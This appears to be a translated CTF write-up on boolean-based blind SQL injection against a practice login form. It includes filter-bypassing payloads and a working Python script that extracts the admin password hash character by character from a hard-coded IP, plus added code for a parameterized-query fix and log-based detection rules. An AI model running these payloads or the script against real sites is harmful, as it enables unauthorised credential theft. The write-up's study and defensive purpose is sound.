Python SQL injection CTF: CTF-WEB, blind SQL injection on a login form
Some seniors gave me a practice platform. I had recently learned a lot about SQL injection and writing scripts and was eager to try it out, but this one turned into a long march; there are still many things I am not familiar with.
First, find the injection point:
I found that a wrong username and a wrong password produce separate error messages, so boolean-based blind injection can be used, (*^▽^*) so happy.
But then I found that spaces and the * character are filtered. No matter, bypass with parentheses (this almost killed me).
I started writing a script, only to find that plain requests could not read the content under the tag, so I went off to learn "Beautiful Soup" (BeautifulSoup) for parsing web pages.
First, a piece of test code:
# -*- coding:utf-8 -*-
from bs4 import BeautifulSoup
import requests

session = requests.Session()
paramsPost = {"password": "1", "username": "admin"}
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", "Referer": "http://152.136.63.75:8002/", "Connection": "close", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "DNT": "1", "Content-Type": "application/x-www-form-urlencoded"}
cookies = {"PHPSESSID": "f1jb3rhc5ebhv1gf7q943bb413"}
res = session.post("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)
res.encoding = 'utf-8'
print("Status code: %i" % res.status_code)
#print("Response body: %s" % res.content)
soup = BeautifulSoup(res.text, 'html.parser')
# look for the site's "wrong password" message in the parsed page
result = soup.find_all(text='密码错误')
print(result)
print(type(result))
Output:
Here you can use a Burp Suite extension, Reissue Request Scripter, to generate the requests headers quickly and save time when writing the script.
Next comes constructing the statements. You can check locally in a SQL viewer whether your statement is correct, because there really are a lot of parentheses and you have to keep trying.
I also learned a lesson here: first write the payloads down one by one in a notepad, and keep the query statement separate from the judgement statement:
# The body that everything is finally spliced into
admin'^1^(ascii()={})
# substr to confirm the data one character at a time
substr(( ),{},1)
# The query statement
select(group_concat(table_name))from(information_schema.tables)where(table_schema)=(database())
# Each time the query statement is swapped, combine everything again (this column-name query had me doubting my life)
admin'^1^if((select(length(group_concat(column_name))=%d)from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),1,0)#
Pay particular attention here to the length check (this is another easy place to go wrong):
# You must write select (length() = '')
select * from users where id =1^if((select(length(group_concat(table_name))=' ')from(information_schema.tables)where(table_schema)=(database())),1,0);
# Wrong statement
select * from users where id =1^if((select(length(group_concat(table_name)))from(information_schema.tables)where(table_schema)=(database()) = ' '),1,0);
# Whatever number you put in, the result is always NULL
The comparison sits in a different position, so the result is different, and that changes the final outcome.
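The whole technique above depends on two things the challenge got wrong: the username is concatenated into the SQL text, and a missing user and a bad password produce different messages. The following is an added example (not code from the original post) that puts the vulnerable handler beside a hardened one, using an in-memory sqlite3 table in place of the challenge's MySQL database; the table row, the `placeholder-md5-hash` value and the two probe inputs are constructed for the demonstration.

```python
import hmac
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the challenge's admin table.
    The table and column names follow the writeup; the row contents are made up."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin', 'placeholder-md5-hash')")
    return db


def login_vulnerable(db, username, password):
    """The pattern the writeup exploits: the username is concatenated into the SQL
    text, and 'no such user' and 'bad password' are reported differently."""
    query = "SELECT password FROM admin WHERE username='%s'" % username
    row = db.execute(query).fetchone()
    if row is None:
        return "wrong username"
    if row[0] != password:
        return "wrong password"
    return "ok"


def login_hardened(db, username, password):
    """Bound parameter: the submitted value can never change the query structure.
    One generic message for every failure, so there is no true/false bit to observe."""
    row = db.execute("SELECT password FROM admin WHERE username=?", (username,)).fetchone()
    # compare_digest keeps the comparison time independent of where the strings differ
    if row is None or not hmac.compare_digest(row[0], password):
        return "invalid credentials"
    return "ok"


# Constructed probe pair: identical except that the injected condition is true or false.
PROBES = ("admin' AND 1=1 --", "admin' AND 1=0 --")


def distinguishes_condition(login_fn, db):
    """True when the handler's failure messages differ between the two probes,
    i.e. when one bit of the query result can be read per request."""
    messages = {login_fn(db, user, "not-the-password") for user in PROBES}
    return len(messages) > 1


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks a bit:", distinguishes_condition(login_vulnerable, db))
    print("hardened handler leaks a bit:  ", distinguishes_condition(login_hardened, db))
```

Both fixes matter on their own: the parameterized query stops the input from being interpreted as SQL, and the single failure message removes the oracle even if some other query on the site is still built by concatenation. The MySQL-specific `^` and `#` syntax from the writeup is not valid sqlite, which is why the probes use the plain `AND ... --` form here.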
The script:
import requests
import string
from bs4 import BeautifulSoup

# characters to try at each position: letters, digits and the punctuation used by the flag
charset = string.ascii_lowercase + string.ascii_uppercase + string.digits + '-{}+='

session = requests.Session()
paramsPost = {"password": 1, "username": " "}
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", "Referer": "http://152.136.63.75:8002/", "Connection": "close", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "DNT": "1", "Content-Type": "application/x-www-form-urlencoded"}
cookies = {"PHPSESSID": "f1jb3rhc5ebhv1gf7q943bb413"}


def length():
    # find the length of the value by testing "length = i" for each i;
    # the "wrong password" message means the condition was true
    len1 = 0
    for i in range(50):
        #paramsPost['username'] = "admin'^1^if((select(length(group_concat(column_name))=%d)from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),1,0)#" % i
        paramsPost['username'] = "admin'^1^(select(length(password)=%d)from(admin)where(username)='admin')#" % i
        res = session.post("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)
        res.encoding = 'utf-8'
        soup = BeautifulSoup(res.text, 'html.parser')
        result = soup.find_all(text='密码错误')
        print(result)
        if len(result) != 0:
            len1 = i
            break
    print(len1)
    return len1


def name():
    # recover the value one character at a time, stopping at the closing '}'
    flag = " "
    for i in range(length()):
        for str1 in charset:
            #paramsPost["username"] = "admin'^1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),{},1))={})#".format(i+1, ord(str1))
            paramsPost["username"] = "admin'^1^(ascii(substr((select(password)from(admin)where(username)='admin'),{},1))={})#".format(i+1, ord(str1))
            print(str1)
            res = session.post("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)
            res.encoding = 'utf-8'
            soup = BeautifulSoup(res.text, 'html.parser')
            result = soup.find_all(text='密码错误')
            #print(result)
            if len(result) != 0:
                flag += str1
                break
        print(flag)
        if flag[-1] == '}':
            break
    print(flag)


name()
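From the defender's side, a script like the one above leaves a very recognisable trace: one session submitting dozens of failed logins per minute, each with a username field full of SQL functions and schema names. The following is an added example (not from the original post) of detection logic run over constructed application log lines; the `timestamp|session|username|result` format is hypothetical, the PHPSESSID value and payload shapes mirror the writeup's script, and the timestamps and other users are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed application log: timestamp|session|submitted username|login result.
# Hypothetical format; the challenge site's real logging is not shown in the writeup.
SAMPLE_LOG = """\
2020-04-24T10:00:01Z|a1b2c3|alice|ok
2020-04-24T10:00:09Z|a1b2c3|alice|wrong password
2020-04-24T10:00:15Z|d4e5f6|bob|ok
2020-04-24T10:01:00Z|f1jb3rhc5ebhv1gf7q943bb413|admin'^1^(select(length(password)=1)from(admin)where(username)='admin')#|wrong username
2020-04-24T10:01:01Z|f1jb3rhc5ebhv1gf7q943bb413|admin'^1^(select(length(password)=2)from(admin)where(username)='admin')#|wrong username
2020-04-24T10:01:02Z|f1jb3rhc5ebhv1gf7q943bb413|admin'^1^(select(length(password)=3)from(admin)where(username)='admin')#|wrong username
2020-04-24T10:01:03Z|f1jb3rhc5ebhv1gf7q943bb413|admin'^1^(ascii(substr((select(password)from(admin)where(username)='admin'),1,1))=97)#|wrong username
2020-04-24T10:01:04Z|f1jb3rhc5ebhv1gf7q943bb413|admin'^1^(ascii(substr((select(password)from(admin)where(username)='admin'),1,1))=98)#|wrong password
2020-04-24T10:01:05Z|f1jb3rhc5ebhv1gf7q943bb413|admin'^1^(ascii(substr((select(password)from(admin)where(username)='admin'),2,1))=97)#|wrong username
2020-04-24T10:05:00Z|d4e5f6|bob o'brien|wrong password
"""

# Tokens a login form's username field has no legitimate reason to contain:
# a quote followed by the XOR operator, or bare MySQL functions / schema names.
# A lone apostrophe (as in "o'brien") is deliberately not matched.
SQL_SHAPE = re.compile(
    r"'\^|select\(|information_schema|substr\(|ascii\(|length\(|group_concat", re.I
)


def parse_log(text):
    """Split each line into a dict; the username is the only field that may contain '|'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        head, result = line.rsplit("|", 1)
        ts, sess, user = head.split("|", 2)
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "sess": sess, "user": user, "result": result,
        })
    return events


def suspicious_username(user):
    """Content rule: does the submitted username look like SQL?"""
    return SQL_SHAPE.search(user) is not None


def burst_sessions(events, window=timedelta(seconds=60), threshold=5):
    """Rate rule: sessions with at least `threshold` failed logins inside any `window`.
    Catches the enumeration loop even if the payload shape changes."""
    failures = defaultdict(list)
    for e in events:
        if e["result"] != "ok":
            failures[e["sess"]].append(e["ts"])
    flagged = set()
    for sess, times in failures.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window's left edge forward
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(sess)
                break
    return flagged


def analyze(text):
    events = parse_log(text)
    hits = [(e["ts"].isoformat(), e["sess"]) for e in events if suspicious_username(e["user"])]
    return {"sql_pattern_hits": hits, "burst_sessions": burst_sessions(events)}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    print("SQL-shaped usernames:", len(report["sql_pattern_hits"]))
    print("bursting sessions:   ", sorted(report["burst_sessions"]))
```

The two rules are complementary: the content rule fires on the first request, before any data has been extracted, while the rate rule is independent of the filter-bypass tricks (parentheses instead of spaces, XOR instead of AND) and would still fire on a script that has been rewritten to dodge the regex.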
Extracting the data step by step, the admin password turned out to be an MD5 value.
In the end I found this challenge is basically the same as Bugku's login3, but doing it from start to finish myself showed that my statement construction still has many weak spots; blind SQL injection needs a lot more practice.
Original link: https://blog.csdn.net/weixin_45887311/article/details/105739091